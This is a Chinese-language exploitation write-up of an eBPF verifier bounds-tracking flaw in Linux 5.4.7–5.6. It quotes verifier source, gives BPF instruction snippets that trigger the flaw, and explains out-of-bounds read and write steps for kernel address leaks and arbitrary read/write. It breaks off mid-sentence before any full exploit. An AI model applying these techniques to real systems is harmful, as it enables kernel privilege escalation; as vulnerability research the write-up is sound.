文章目录
- 前言
- 漏洞分析
- do_check 函数
- 漏洞利用
- 漏洞触发
- 越界读实现地址泄漏
- 越界写实现任意读
- 越界写实现任意写
- exp 即效果演示
- 参考
前言
影响版本:v5.4.7 ~ v5.5.0
以及更新的版本,如 5.6
编译选项:CONFIG_BPF_SYSCALL
,config
所有带 BPF
字样的编译选项
漏洞概述:该漏洞是在 commit 581738a681b6 中引入,verifier
没有正确地将64位值转换为32位(直接取低32位),使得 BPF
寄存器的值在代码验证阶段和实际执行阶段不一致,导致越界读写
测试环境:测试环境 linux-5.6.0
漏洞分析
ebpf
程序在被加载到内核后,首先会模拟执行一遍以此检查 ebpf
中可能出现的错误或者恶意代码。而 verifier
会对 ebpf
进行静态检查,漏洞调用链如下:
bpf_check
do_check_main
do_check_common
do_check
check_cond_jmp_op
reg_set_min_max
在 bpf_prog_load
中可以看到这里会执行 verifier -- bpf_check
:
static int bpf_prog_load(union bpf_attr *attr, union bpf_attr __user *uattr)
{
......
/* run eBPF verifier */
err = bpf_check(&prog, attr, uattr);
if (err < 0)
goto free_used_maps;
......
}
bpf_check
会调用到 do_check_main
函数:
int bpf_check(struct bpf_prog **prog, union bpf_attr *attr,
union bpf_attr __user *uattr)
{
......
ret = check_cfg(env);
if (ret < 0)
goto skip_full_check;
ret = do_check_subprogs(env);
ret = ret ?: do_check_main(env);
if (ret == 0 && bpf_prog_is_dev_bound(env->prog->aux))
ret = bpf_prog_offload_finalize(env);
......
}
do_check_main
主要就是调用了 do_check_common
函数:
static int do_check_main(struct bpf_verifier_env *env)
{
int ret;
env->insn_idx = 0;
ret = do_check_common(env, 0);
if (!ret)
env->prog->aux->stack_depth = env->subprog_info[0].stack_depth;
return ret;
}
do_check_common
最后会调用到 do_check
函数:
static int do_check_common(struct bpf_verifier_env *env, int subprog)
{
......
ret = do_check(env);
......
}
最后的漏洞也是出现在 do_check
函数中,所以这里重点看下 do_check
函数。
do_check 函数
do_check
函数有点长,这里我还是重点看漏洞出现的执行分支:
static int do_check(struct bpf_verifier_env *env)
{
struct bpf_verifier_state *state = env->cur_state;
struct bpf_insn *insns = env->prog->insnsi;
struct bpf_reg_state *regs;
int insn_cnt = env->prog->len;
bool do_print_state = false;
int prev_insn_idx = -1;
// 遍历每一条指令
for (;;) {
struct bpf_insn *insn;
u8 class;
int err;
env->prev_insn_idx = prev_insn_idx; // 前一条指令 idx
if (env->insn_idx >= insn_cnt) { // insn_cnt 为指令总数量
verbose(env, "invalid insn idx %d insn_cnt %d\n", env->insn_idx, insn_cnt);
return -EFAULT;
}
insn = &insns[env->insn_idx]; // 获取指令
class = BPF_CLASS(insn->code); // 获取指令类型
// 指令数量有限制
if (++env->insn_processed > BPF_COMPLEXITY_LIMIT_INSNS) {
verbose(env, "BPF program is too large. Processed %d insn\n", env->insn_processed);
return -E2BIG;
}
// 该指令是否处理过
err = is_state_visited(env, env->insn_idx);
if (err < 0)
return err;
if (err == 1) {
/* found equivalent state, can prune the search */
if (env->log.level & BPF_LOG_LEVEL) {
// log 相关的东西
}
goto process_bpf_exit;
}
if (signal_pending(current))
return -EAGAIN;
if (need_resched())
cond_resched();
// log 相关的东西
if (env->log.level & BPF_LOG_LEVEL2 ||
(env->log.level & BPF_LOG_LEVEL && do_print_state)) {
......
}
if (env->log.level & BPF_LOG_LEVEL) {
// log 相关的东西
......
}
if (bpf_prog_is_dev_bound(env->prog->aux)) {
err = bpf_prog_offload_verify_insn(env, env->insn_idx,
env->prev_insn_idx);
if (err)
return err;
}
regs = cur_regs(env);
env->insn_aux_data[env->insn_idx].seen = env->pass_cnt;
prev_insn_idx = env->insn_idx;
// 下面就是针对不同的指令类型进行不同的检查处理了
// 这里我们主要关注跳转指令,这里也是漏洞分支
if (class == BPF_ALU || class == BPF_ALU64) {
err = check_alu_op(env, insn);
if (err) return err;
} else if (class == BPF_LDX) {
enum bpf_reg_type *prev_src_type, src_reg_type;
err = check_reg_arg(env, insn->src_reg, SRC_OP);
if (err) return err;
err = check_reg_arg(env, insn->dst_reg, DST_OP_NO_MARK);
if (err) return err;
src_reg_type = regs[insn->src_reg].type;
err = check_mem_access(env, env->insn_idx, insn->src_reg,
insn->off, BPF_SIZE(insn->code),
BPF_READ, insn->dst_reg, false);
......
} else if (class == BPF_STX) {
enum bpf_reg_type *prev_dst_type, dst_reg_type;
if (BPF_MODE(insn->code) == BPF_XADD) {
err = check_xadd(env, env->insn_idx, insn);
if (err) return err;
env->insn_idx++;
continue;
}
/* check src1 operand */
err = check_reg_arg(env, insn->src_reg, SRC_OP);
if (err) return err;
/* check src2 operand */
err = check_reg_arg(env, insn->dst_reg, SRC_OP);
if (err) return err;
dst_reg_type = regs[insn->dst_reg].type;
/* check that memory (dst_reg + off) is writeable */
err = check_mem_access(env, env->insn_idx, insn->dst_reg,
insn->off, BPF_SIZE(insn->code),
BPF_WRITE, insn->src_reg, false);
......
} else if (class == BPF_ST) {
......
} else if (class == BPF_JMP || class == BPF_JMP32) {
// 针对跳转指令的处理,有 32 位跳转和 64 位跳转
u8 opcode = BPF_OP(insn->code);
env->jmps_processed++;
if (opcode == BPF_CALL) {
// call 指令
......
} else if (opcode == BPF_JA) {
// ja 指令
......
} else if (opcode == BPF_EXIT) {
// exit 指令
......
process_bpf_exit:
......
} else {
// 条件跳转指令
err = check_cond_jmp_op(env, insn, &env->insn_idx);
if (err) return err;
}
} else if (class == BPF_LD) {
......
} else {
verbose(env, "unknown insn class %d\n", class);
return -EINVAL;
}
env->insn_idx++;
}
return 0;
}
条件跳转指令会由 check_cond_jmp_op
函数进行处理:
static int check_cond_jmp_op(struct bpf_verifier_env *env,
struct bpf_insn *insn, int *insn_idx)
{
struct bpf_verifier_state *this_branch = env->cur_state;
struct bpf_verifier_state *other_branch;
struct bpf_reg_state *regs = this_branch->frame[this_branch->curframe]->regs;
struct bpf_reg_state *dst_reg, *other_branch_regs, *src_reg = NULL;
u8 opcode = BPF_OP(insn->code);
bool is_jmp32;
int pred = -1;
int err;
/* Only conditional jumps are expected to reach here. */
// 检查是否是 >条件分支跳转<
if (opcode == BPF_JA || opcode > BPF_JSLE) {
verbose(env, "invalid BPF_JMP/JMP32 opcode %x\n", opcode);
return -EINVAL;
}
// 操作数是寄存器
if (BPF_SRC(insn->code) == BPF_X) {
if (insn->imm != 0) {
verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
return -EINVAL;
}
/* check src1 operand */
err = check_reg_arg(env, insn->src_reg, SRC_OP);
if (err) return err;
if (is_pointer_value(env, insn->src_reg)) {
verbose(env, "R%d pointer comparison prohibited\n", insn->src_reg);
return -EACCES;
}
src_reg = ®s[insn->src_reg];
// 操作数是立即数
} else {
// src_reg 必须是 0
if (insn->src_reg != BPF_REG_0) {
verbose(env, "BPF_JMP/JMP32 uses reserved fields\n");
return -EINVAL;
}
}
/* check src2 operand */
err = check_reg_arg(env, insn->dst_reg, SRC_OP);
if (err) return err;
// 获取目的寄存器 dst_reg
dst_reg = ®s[insn->dst_reg];
// 是否 jmp32
is_jmp32 = BPF_CLASS(insn->code) == BPF_JMP32;
// is_branch_taken 主要就是检查分支是否可以预测
// 比如这里是立即数跳转:dst_reg 寄存器的 umin = 1, umax = 7,而 imm = 0
// 那么对于 jle dst_reg imm off 而言:dst_reg.umin > imm,所以这里可以肯定不会跳转
// 所以为了使得 pred = -1,就得让 dst_reg 为 uknown
// 这里可以从 map 中加载数据到 dst_reg 中使得 dst_reg 为 unknown
if (BPF_SRC(insn->code) == BPF_K)
pred = is_branch_taken(dst_reg, insn->imm, opcode, is_jmp32);
else if (src_reg->type == SCALAR_VALUE && tnum_is_const(src_reg->var_off))
pred = is_branch_taken(dst_reg, src_reg->var_off.value, opcode, is_jmp32);
if (pred >= 0) {
err = mark_chain_precision(env, insn->dst_reg);
if (BPF_SRC(insn->code) == BPF_X && !err)
err = mark_chain_precision(env, insn->src_reg);
if (err) return err;
}
// 可以看到这里的 if-else pred = 0/1 都会直接返回
// 为了使得向下执行,得让 pred = -1,即寄存器为 unknown
if (pred == 1) {
/* only follow the goto, ignore fall-through */
*insn_idx += insn->off;
return 0;
} else if (pred == 0) {
/* only follow fall-through branch, since
* that's where the program will go
*/
return 0;
}
// 保存另一个分支
other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx, false);
if (!other_branch)
return -EFAULT;
// 获取另一个分支寄存器的状态
other_branch_regs = other_branch->frame[other_branch->curframe]->regs;
/* detect if we are comparing against a constant value so we can adjust
* our min/max values for our dst register.
* this is only legit if both are scalars (or pointers to the same
* object, I suppose, but we don't support that right now), because
* otherwise the different base pointers mean the offsets aren't
* comparable.
*/
// 操作数是寄存器
if (BPF_SRC(insn->code) == BPF_X) {
struct bpf_reg_state *src_reg = ®s[insn->src_reg];
struct bpf_reg_state lo_reg0 = *dst_reg;
struct bpf_reg_state lo_reg1 = *src_reg;
struct bpf_reg_state *src_lo, *dst_lo;
dst_lo = &lo_reg0;
src_lo = &lo_reg1;
coerce_reg_to_size(dst_lo, 4);
coerce_reg_to_size(src_lo, 4);
if (dst_reg->type == SCALAR_VALUE &&
src_reg->type == SCALAR_VALUE) {
if (tnum_is_const(src_reg->var_off) ||
(is_jmp32 && tnum_is_const(src_lo->var_off)))
reg_set_min_max(&other_branch_regs[insn->dst_reg],
dst_reg,
is_jmp32
? src_lo->var_off.value
: src_reg->var_off.value,
opcode, is_jmp32);
else if (tnum_is_const(dst_reg->var_off) ||
(is_jmp32 && tnum_is_const(dst_lo->var_off)))
reg_set_min_max_inv(&other_branch_regs[insn->src_reg],
src_reg,
is_jmp32
? dst_lo->var_off.value
: dst_reg->var_off.value,
opcode, is_jmp32);
else if (!is_jmp32 &&
(opcode == BPF_JEQ || opcode == BPF_JNE))
/* Comparing for equality, we can combine knowledge */
reg_combine_min_max(&other_branch_regs[insn->src_reg],
&other_branch_regs[insn->dst_reg],
src_reg, dst_reg, opcode);
}
} else if (dst_reg->type == SCALAR_VALUE) {
// 操作数是立即数,这里是直接调用了 reg_set_min_max 进行处理
reg_set_min_max(&other_branch_regs[insn->dst_reg], dst_reg, insn->imm, opcode, is_jmp32);
}
/* detect if R == 0 where R is returned from bpf_map_lookup_elem().
* NOTE: these optimizations below are related with pointer comparison
* which will never be JMP32.
*/
if (!is_jmp32 && BPF_SRC(insn->code) == BPF_K &&
insn->imm == 0 && (opcode == BPF_JEQ || opcode == BPF_JNE) &&
reg_type_may_be_null(dst_reg->type)) {
/* Mark all identical registers in each branch as either
* safe or unknown depending R == 0 or R != 0 conditional.
*/
mark_ptr_or_null_regs(this_branch, insn->dst_reg, opcode == BPF_JNE);
mark_ptr_or_null_regs(other_branch, insn->dst_reg, opcode == BPF_JEQ);
} else if (!try_match_pkt_pointers(insn, dst_reg, ®s[insn->src_reg], this_branch, other_branch) & is_pointer_value(env, insn->dst_reg)) {
verbose(env, "R%d pointer comparison prohibited\n", insn->dst_reg);
return -EACCES;
}
if (env->log.level & BPF_LOG_LEVEL)
print_verifier_state(env, this_branch->frame[this_branch->curframe]);
return 0;
}
可以看到针对立即数条件跳转指令,调用了 reg_set_min_max
进行处理:
这里得说明一下,这里的
true_reg
其实就是dst_reg
,通过调试可以验证
/* Adjusts the register min/max values in the case that the dst_reg is the
* variable register that we are working on, and src_reg is a constant or we're
* simply doing a BPF_K check.
* In JEQ/JNE cases we also adjust the var_off values.
*/
static void reg_set_min_max(struct bpf_reg_state *true_reg,
struct bpf_reg_state *false_reg, u64 val,
u8 opcode, bool is_jmp32)
{
s64 sval;
/* If the dst_reg is a pointer, we can't learn anything about its
* variable offset from the compare (unless src_reg were a pointer into
* the same object, but we don't bother with that.
* Since false_reg and true_reg have the same type by construction, we
* only need to check one of them for pointerness.
*/
if (__is_pointer_value(false, false_reg))
return;
val = is_jmp32 ? (u32)val : val;
sval = is_jmp32 ? (s64)(s32)val : (s64)val;
switch (opcode) {
case BPF_JEQ:
case BPF_JNE:
{
struct bpf_reg_state *reg = opcode == BPF_JEQ ? true_reg : false_reg;
/* For BPF_JEQ, if this is false we know nothing Jon Snow, but
* if it is true we know the value for sure. Likewise for
* BPF_JNE.
*/
if (is_jmp32) {
u64 old_v = reg->var_off.value;
u64 hi_mask = ~0xffffffffULL;
reg->var_off.value = (old_v & hi_mask) | val;
reg->var_off.mask &= hi_mask;
} else {
__mark_reg_known(reg, val);
}
break;
}
case BPF_JSET:
false_reg->var_off = tnum_and(false_reg->var_off, tnum_const(~val));
if (is_power_of_2(val))
true_reg->var_off = tnum_or(true_reg->var_off, tnum_const(val));
break;
case BPF_JGE:
case BPF_JGT:
{
// BPF_JGE change true_reg.umin_value
u64 false_umax = opcode == BPF_JGT ? val : val - 1;
u64 true_umin = opcode == BPF_JGT ? val + 1 : val;
if (is_jmp32) {
false_umax += gen_hi_max(false_reg->var_off);
true_umin += gen_hi_min(true_reg->var_off);
}
false_reg->umax_value = min(false_reg->umax_value, false_umax);
true_reg->umin_value = max(true_reg->umin_value, true_umin);
break;
}
case BPF_JSGE:
case BPF_JSGT:
{
s64 false_smax = opcode == BPF_JSGT ? sval : sval - 1;
s64 true_smin = opcode == BPF_JSGT ? sval + 1 : sval;
/* If the full s64 was not sign-extended from s32 then don't
* deduct further info.
*/
if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
break;
false_reg->smax_value = min(false_reg->smax_value, false_smax);
true_reg->smin_value = max(true_reg->smin_value, true_smin);
break;
}
case BPF_JLE:
case BPF_JLT:
{
u64 false_umin = opcode == BPF_JLT ? val : val + 1;
u64 true_umax = opcode == BPF_JLT ? val - 1 : val;
if (is_jmp32) {
false_umin += gen_hi_min(false_reg->var_off);
true_umax += gen_hi_max(true_reg->var_off);
}
false_reg->umin_value = max(false_reg->umin_value, false_umin);
true_reg->umax_value = min(true_reg->umax_value, true_umax);
break;
}
case BPF_JSLE:
case BPF_JSLT:
{
s64 false_smin = opcode == BPF_JSLT ? sval : sval + 1;
s64 true_smax = opcode == BPF_JSLT ? sval - 1 : sval;
if (is_jmp32 && !cmp_val_with_extended_s64(sval, false_reg))
break;
false_reg->smin_value = max(false_reg->smin_value, false_smin);
true_reg->smax_value = min(true_reg->smax_value, true_smax);
break;
}
default:
break;
}
__reg_deduce_bounds(false_reg);
__reg_deduce_bounds(true_reg);
/* We might have learned some bits from the bounds. */
__reg_bound_offset(false_reg);
__reg_bound_offset(true_reg);
if (is_jmp32) {
__reg_bound_offset32(false_reg);
__reg_bound_offset32(true_reg);
}
/* Intersecting with the old var_off might have improved our bounds
* slightly. e.g. if umax was 0x7f...f and var_off was (0; 0xf...fc),
* then new var_off is (0; 0x7f...fc) which improves our umax.
*/
__update_reg_bounds(false_reg);
__update_reg_bounds(true_reg);
}
主要来看下 __reg_bound_offset32
函数:
// min = 1, max = 1 0000 0001
// min & mask = 1, max & mask = 1
struct tnum tnum_range(u64 min, u64 max)
{
// chi = min ^ max = 0
u64 chi = min ^ max, delta;
// fls64() 从 lsb->masb 取二进制中第一个 1 的位置
// eg: 5 = (101)2 ==> fls64(5) = 1
// bits = fls64(chi) = 0
u8 bits = fls64(chi);
/* special case, needed because 1ULL << 64 is undefined */
if (bits > 63)
return tnum_unknown;
/* e.g. if chi = 4, bits = 3, delta = (1<<3) - 1 = 7.
* if chi = 0, bits = 0, delta = (1<<0) - 1 = 0, so we return
* constant min (since min == max).
*/
// delta = (1ULL << 0) - 1 = 0;
delta = (1ULL << bits) - 1;
// { value = 1, mask = 0 }
return TNUM(min & ~delta, delta);
}
static void __reg_bound_offset32(struct bpf_reg_state *reg)
{
// 传入 tnum_range 的参数直接去掉了高 32 bits 数据
u64 mask = 0xffffFFFF;
// umin_value = 1, umax_value = 1 0000 0001
// range = { value = 1, mask = 0 }
struct tnum range = tnum_range(reg->umin_value & mask, reg->umax_value & mask);
// 取低 32 位
struct tnum lo32 = tnum_cast(reg->var_off, 4);
// 取高 32 位
struct tnum hi32 = tnum_lshift(tnum_rshift(reg->var_off, 32), 32);
/*
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
u64 v, mu;
v = a.value | b.value;
mu = a.mask & b.mask;
return TNUM(v & ~mu, mu);
}
struct tnum tnum_or(struct tnum a, struct tnum b)
{
u64 v, mu;
v = a.value | b.value;
mu = a.mask | b.mask;
return TNUM(v, mu & ~v);
}
*/
// tnum_intersect(lo32, range) ==> { value = lo32.value | 1, mask = 0 }
// tnum_or(hi32, ) ==> { value = hi32.value | lo32.value | 1, hi32.mask }
// 最后 reg->var_off.mask_lo32 = 0, reg->var_off.mask_hi32 = hi32.mask
// reg->var_off.value_lo32 = 1, reg->var_off.mask_hi32 = hi32_value
reg->var_off = tnum_or(hi32, tnum_intersect(lo32, range));
}
这里请看注释漏洞很明显了,这里对于一个寄存器 dst_reg
,其 umin = 1, umax = 0x1 0000 0001
,再经过 __reg_bound_offset32
处理后,其 var_off
被设置了 { value = 0xXXXX XXXX 0000 0001, mask = 0xXXXX XXXX 0000 0000 }
,即这里的低 32 位是确定了的。
所以问题就来了,这里的 dst_reg
不一定就是确认的,正如上述所说,我们可以从 map
中加载值到 dst_reg
中,所以此时 dst_reg
的值是可以变了,经过 __reg_bound_offset32
处理后,其却变成了一个确定的值。
漏洞利用
漏洞触发
注意事项:
- 想要执行到
reg_set_min_max
路径,必须绕过is_branch_taken
,即dst_reg
应该是不确定的 - 要让
dst_reg.umin = 1, dst_reg_umax = 0x1 0000 0001
问题1解决方案
加载 map
的值到 dst_reg
中:
可以看到 dst_reg = reg6
的 var_off
是 unknown
的,其可以执行到 reg_set_min_max
:
问题2解决方案
这里得重新回到 reg_set_min_max
函数:
static void reg_set_min_max(struct bpf_reg_state *true_reg,
struct bpf_reg_state *false_reg, u64 val,
u8 opcode, bool is_jmp32)
{
s64 sval;
if (__is_pointer_value(false, false_reg))
return;
val = is_jmp32 ? (u32)val : val;
sval = is_jmp32 ? (s64)(s32)val : (s64)val;
switch (opcode) {
case BPF_JEQ:
case BPF_JNE:
......
case BPF_JSET:
......
case BPF_JGE:
case BPF_JGT:
{
// BPF_JGE change true_reg.umin_value
u64 false_umax = opcode == BPF_JGT ? val : val - 1;
u64 true_umin = opcode == BPF_JGT ? val + 1 : val;
if (is_jmp32) {
false_umax += gen_hi_max(false_reg->var_off);
true_umin += gen_hi_min(true_reg->var_off);
}
false_reg->umax_value = min(false_reg->umax_value, false_umax);
true_reg->umin_value = max(true_reg->umin_value, true_umin);
break;
}
case BPF_JSGE:
case BPF_JSGT:
......
case BPF_JLE:
case BPF_JLT:
{
u64 false_umin = opcode == BPF_JLT ? val : val + 1;
u64 true_umax = opcode == BPF_JLT ? val - 1 : val;
if (is_jmp32) {
false_umin += gen_hi_min(false_reg->var_off);
true_umax += gen_hi_max(true_reg->var_off);
}
false_reg->umin_value = max(false_reg->umin_value, false_umin);
true_reg->umax_value = min(true_reg->umax_value, true_umax);
break;
}
case BPF_JSLE:
case BPF_JSLT:
......
default:
break;
}
__reg_deduce_bounds(false_reg);
__reg_deduce_bounds(true_reg);
/* We might have learned some bits from the bounds. */
__reg_bound_offset(false_reg);
__reg_bound_offset(true_reg);
if (is_jmp32) {
__reg_bound_offset32(false_reg);
__reg_bound_offset32(true_reg);
}
__update_reg_bounds(false_reg);
__update_reg_bounds(true_reg);
}
看到这里的第 1/2 个参数,分别是 true_reg
和 false_reg
,我们将断点打在这个函数这里,然后查看其参数:
可以发现这里的 true_reg
就是 dst_reg
,所以我们可以在 reg_set_min_max
函数中利用 BPF_JGT
和 BPF_JLT
修改 dst_reg
的 umin/umax
1、修改 dst_reg.umin = 1
这里很简单,在 reg_set_min_max
中,可以看到:
case BPF_JGE:
case BPF_JGT:
{
// BPF_JGE change true_reg.umin_value
// val = insn->imm = imm
u64 false_umax = opcode == BPF_JGT ? val : val - 1;
u64 true_umin = opcode == BPF_JGT ? val + 1 : val;
if (is_jmp32) {
false_umax += gen_hi_max(false_reg->var_off);
true_umin += gen_hi_min(true_reg->var_off);
}
false_reg->umax_value = min(false_reg->umax_value, false_umax);
true_reg->umin_value = max(true_reg->umin_value, true_umin);
break;
}
所以我们可以通过如下指令去设置 dst_reg.umin = 1
: 这里的 dst_reg
为 reg6
BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 1, 1)
执行完后,可以看到 umin
成功被修改为 1
:
2、修改 dst_reg.umax = 0x1 0000 0001
这里如果我们参考修改 umin
的话,你会发现一个问题,即这里的 val = 0x1 0000 0001
,而 imm
是 int
类型,所以这里是无法直接利用立即数条件跳转的
所以这里还是得回到 check_cond_jmp_op
函数:
if (BPF_SRC(insn->code) == BPF_X) {
struct bpf_reg_state *src_reg = ®s[insn->src_reg];
struct bpf_reg_state lo_reg0 = *dst_reg;
struct bpf_reg_state lo_reg1 = *src_reg;
struct bpf_reg_state *src_lo, *dst_lo;
dst_lo = &lo_reg0;
src_lo = &lo_reg1;
coerce_reg_to_size(dst_lo, 4);
coerce_reg_to_size(src_lo, 4);
if (dst_reg->type == SCALAR_VALUE &&
src_reg->type == SCALAR_VALUE) {
if (tnum_is_const(src_reg->var_off) ||
(is_jmp32 && tnum_is_const(src_lo->var_off)))
reg_set_min_max(&other_branch_regs[insn->dst_reg],
dst_reg,
is_jmp32
? src_lo->var_off.value
: src_reg->var_off.value,
opcode, is_jmp32);
else if (tnum_is_const(dst_reg->var_off) ||
(is_jmp32 && tnum_is_const(dst_lo->var_off)))
......
else if (!is_jmp32 &&
(opcode == BPF_JEQ || opcode == BPF_JNE))
......
}
} else if (dst_reg->type == SCALAR_VALUE) {
reg_set_min_max(&other_branch_regs[insn->dst_reg],
dst_reg, insn->imm, opcode, is_jmp32);
}
可以看到这里针对寄存器条件跳转的处理,当 src_reg->var_off
是一个确定的值时,其会调用:
reg_set_min_max(&other_branch_regs[insn->dst_reg],
dst_reg,
is_jmp32
? src_lo->var_off.value
: src_reg->var_off.value,
opcode, is_jmp32);
这里我们如果执行 64 位跳转,则执行函数如下:
reg_set_min_max(&other_branch_regs[insn->dst_reg],
dst_reg, src_reg->var_off.value, opcode, is_jmp32);
然后就和立即数跳转跳转类似了,不同的是,立即数条件跳转 val
传入的是 imm
,而这里 val
传入的是 src_reg->var_off.value
,而 imm
是 int
类型,但是 src_reg->var_off.value
是 64 位的。
通过以下代码修改 umax
:
BPF_MOV64_IMM(BPF_REG_8, 1),
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 1),
BPF_JMP_REG(BPF_JLE, BPF_REG_6, BPF_REG_8, 1),
可能这里笔者会疑惑?为什么不直接设置 src_reg = r8 = 0x1 0000 0001
呢?因为 imm
为 int
类型
调试跟踪:
执行 JLE
处理后:
漏洞触发
漏洞触发比较简单,使用 JMP32
即可,同样 dst_reg
要求 unknown
:
BPF_JMP32_IMM(BPF_JNE, BPF_REG_6, 5, 1),
效果如下:
可以看到 dst_reg
只有第 32 位不确定,其它位都是确定的。这里为了消除第 32 位的影响,我们使用 AND
操作:
BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2),
BPF_ALU64_IMM(BPF_RSH, BPF_REG_6, 1),
这里 r6 & 2
,虽然 r6
的第 32 位是不确定的,但是 2 的第 32 位为 0,所以不管 r6
的第 32 位是 1 还是 0,这里 r6 & 2
的结果都是 0,然后再 r6 >> 1
也是恒为 0 了:
但是这里是存在问题的,因为 r6
的值是从 map
中加载的,所以这里我们可以设置 r6 = 2
,所以真实的情况是:r6 & 2 = 2 & 2 = 2
,然后 r6 >>1 = 2 >> 1 = 1
。所以实际运行时 r6 = 1
而不是 r6 = 0
。
越界读实现地址泄漏
这里主要通过越界读泄漏 kernel base
和 map _addr
这里借助 ebpf
的一个助手函数 bpf_map_lookup_elem_proto
BPF_CALL_2(bpf_map_lookup_elem, struct bpf_map *, map, void *, key)
{
WARN_ON_ONCE(!rcu_read_lock_held());
return (unsigned long) map->ops->map_lookup_elem(map, key);
}
const struct bpf_func_proto bpf_map_lookup_elem_proto = {
.func = bpf_map_lookup_elem,
.gpl_only = false,
.pkt_access = true,
.ret_type = RET_PTR_TO_MAP_VALUE_OR_NULL,
.arg1_type = ARG_CONST_MAP_PTR,
.arg2_type = ARG_PTR_TO_MAP_KEY,
};
可以看到 bpf_map_lookup_elem
函数直接调用了 map->ops->map_lookup_elem(map, key)
,struct bpf_map
定义如下:
可以看到其第一个域为一个 bpf_map_ops
,这里我们创建的是 array map
,所以 bpf_map_ops
为 array_map_ops
:
const struct bpf_map_ops array_map_ops = {
.map_alloc_check = array_map_alloc_check,
.map_alloc = array_map_alloc,
.map_free = array_map_free,
.map_get_next_key = array_map_get_next_key,
.map_lookup_elem = array_map_lookup_elem,
.map_update_elem = array_map_update_elem,
.map_delete_elem = array_map_delete_elem,
.map_gen_lookup = array_map_gen_lookup,
.map_direct_value_addr = array_map_direct_value_addr,
.map_direct_value_meta = array_map_direct_value_meta,
.map_mmap = array_map_mmap,
.map_seq_show_elem = array_map_seq_show_elem,
.map_check_btf = array_map_check_btf,
};
所以 map->ops->map_lookup_elem
就是 array_map_lookup_elem
函数:
static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = *(u32 *)key;
if (unlikely(index >= array->map.max_entries))
return NULL;
return array->value + array->elem_size * (index & array->index_mask);
}
可以看到 map [struct bpf_map]
其实是 array [struct bpf_array]
的一个成员,struct bpf_array
定义如下:
有趣的来啦,array_map_lookup_elem
读取的 value
域在 map
的下方,所以这里通过越界读取是可以直接读取 map
中的内容的,所以这里就可以直接读取 map.bpf_map_ops
去泄漏内核基地址了。而 value
的起始地址相对 map
起始地址为 0x110
,所以可以通过如下指令进行越界读取:
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110),
经过上面的分析我们知道,在验证阶段 r6 = 0
,所以 r6*0x110 = 0
,而实际运行时 r6 = 1
,所以 r6*0x110=0x110
。这时候如果我们读取 value[-r6]
是可以通过验证的,因为验证阶段当作了 value[-0] = value[0]
,但是在实际运行时读取的是 value[-0x110]
,从而直接泄漏 bpf_map_ops
哪现在如何泄漏 map_addr
地址呢【这里泄漏 map_addr
主要是为后面任意写做准备的】?在 bpf_map
中,保存着自己的地址:
所以我们也可以通过越界读取直接泄漏 map_addr
越界写实现任意读
BPF Type Format(BTF)
是一种元数据格式,用于给 eBPF
提供一些额外的信息,在内核中使用 btf
结构体表示一条 btf
信息:
struct btf {
void *data;
struct btf_type **types;
u32 *resolved_ids;
u32 *resolved_sizes;
const char *strings;
void *nohdr_data;
struct btf_header hdr;
u32 nr_types; /* includes VOID for base BTF */
u32 types_size;
u32 data_size;
refcount_t refcnt;
u32 id;
struct rcu_head rcu;
/* split BTF support */
struct btf *base_btf;
u32 start_id; /* first type ID in this BTF (0 for base BTF) */
u32 start_str_off; /* first string offset (0 for base BTF) */
char name[MODULE_NAME_LEN];
bool kernel_btf;
};
注意到在 bpf_map
当中刚好有一个指向 struct btf
的指针:
bpf_map->btf
在什么时候会被访问到?注意到 bpf
系统调用给我们提供的选项中有一个为 BPF_OBJ_GET_INFO_BY_FD
:
SYSCALL_DEFINE3(bpf, int, cmd, union bpf_attr __user *, uattr, unsigned int, size)
{
//...
switch (cmd) {
//...
case BPF_OBJ_GET_INFO_BY_FD:
err = bpf_obj_get_info_by_fd(&attr, uattr);
break;
对于 amap
类型而言最终会调用到 bpf_map_get_info_by_fd()
,在该函数中会把 bpf_map->btf.id
拷贝给用户空间:
static int bpf_map_get_info_by_fd(struct file *file,
struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr)
{
//...
if (map->btf) {
info.btf_id = btf_obj_id(map->btf);
info.btf_key_type_id = map->btf_key_type_id;
info.btf_value_type_id = map->btf_value_type_id;
}
//...
if (copy_to_user(uinfo, &info, info_len) ||
put_user(info_len, &uattr->info.info_len))
return -EFAULT;
return 0;
}
static int bpf_obj_get_info_by_fd(const union bpf_attr *attr,
union bpf_attr __user *uattr)
{
int ufd = attr->info.bpf_fd;
struct fd f;
int err;
if (CHECK_ATTR(BPF_OBJ_GET_INFO_BY_FD))
return -EINVAL;
f = fdget(ufd);
if (!f.file)
return -EBADFD;
if (f.file->f_op == &bpf_prog_fops)
err = bpf_prog_get_info_by_fd(f.file, f.file->private_data, attr,
uattr);
else if (f.file->f_op == &bpf_map_fops)
err = bpf_map_get_info_by_fd(f.file, f.file->private_data, attr,
uattr);
所以我们可以通过越界写控制 btf
指针完成任意地址读,但是注意每次只能读 4 字节。
这里我们利用任意读遍历 init_task
的 tasks
链表,以 comm
为 tag
进行遍历,从而找到 current_task
越界写实现任意写
注意到 array map
的 map_get_next_key()
定义如下,当 key
小于 map.max_entries
时 key
会被写入到 next_key
当中:
/* Called from syscall */
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = key ? *(u32 *)key : U32_MAX;
u32 *next = (u32 *)next_key;
if (index >= array->map.max_entries) {
*next = 0;
return 0;
}
if (index == array->map.max_entries - 1)
return -ENOENT;
*next = index + 1;
return 0;
}
当然对于常规的调用 map_get_next_key()
的流程而言虽然 key
的内容是可控的但是 next_key
指针不是我们所能控制的:
static int map_get_next_key(union bpf_attr *attr)
{
//...
next_key = kmalloc(map->key_size, GFP_USER);
//...
rcu_read_lock();
err = map->ops->map_get_next_key(map, key, next_key);
但是在 map ops
当中有一些函数可以让我们控制这两个参数,我们可以将这样的函数指针替换为 map_get_next_key()
从而完成任意地址写,例如 map_push_elem()
:
struct bpf_map_ops {
//...
int (*map_push_elem)(struct bpf_map *map, void *value, u64 flags);
当我们更新 eBPF map
时,若 map
类型为 BPF_MAP_TYPE_QUEUE
